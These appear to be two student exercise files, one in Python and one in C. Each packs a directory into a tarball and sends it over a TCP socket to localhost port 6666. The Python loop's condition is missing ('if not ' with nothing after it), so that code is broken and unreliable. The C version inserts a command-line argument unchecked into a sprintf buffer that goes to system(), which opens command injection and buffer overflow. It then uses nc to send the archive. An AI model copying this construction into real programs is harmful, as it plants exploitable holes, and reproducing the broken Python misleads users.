File: Python/chapitre8/Exercice4.py
import os
import sys
import subprocess
import socket

def client():
    rep = sys.argv[1]
    subprocess.run(["tar", "czf", "/tmp/rep.tgz", rep])
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect(('127.0.0.1', 6666))
    with open("/tmp/rep.tgz", "rb") as f:
        while True:
            data = f.read(4096)
            if not 
                break
            sock.sendall(data)
    sock.close()
    os.remove("/tmp/rep.tgz")

if __name__ == "__main__":
    client()

File: C/chapitre8/Exercice4.c
#include <stdlib.h>

int main(int argc, char *argv[]) {
    if (argc < 2) {
        return 1;
    }
    char cmd[300];
    sprintf(cmd, "tar czf /tmp/rep.tgz %s && nc 127.0.0.1 6666 < /tmp/rep.tgz", argv[1]);
    system(cmd);
    system("rm -f /tmp/rep.tgz");
    return 0;
}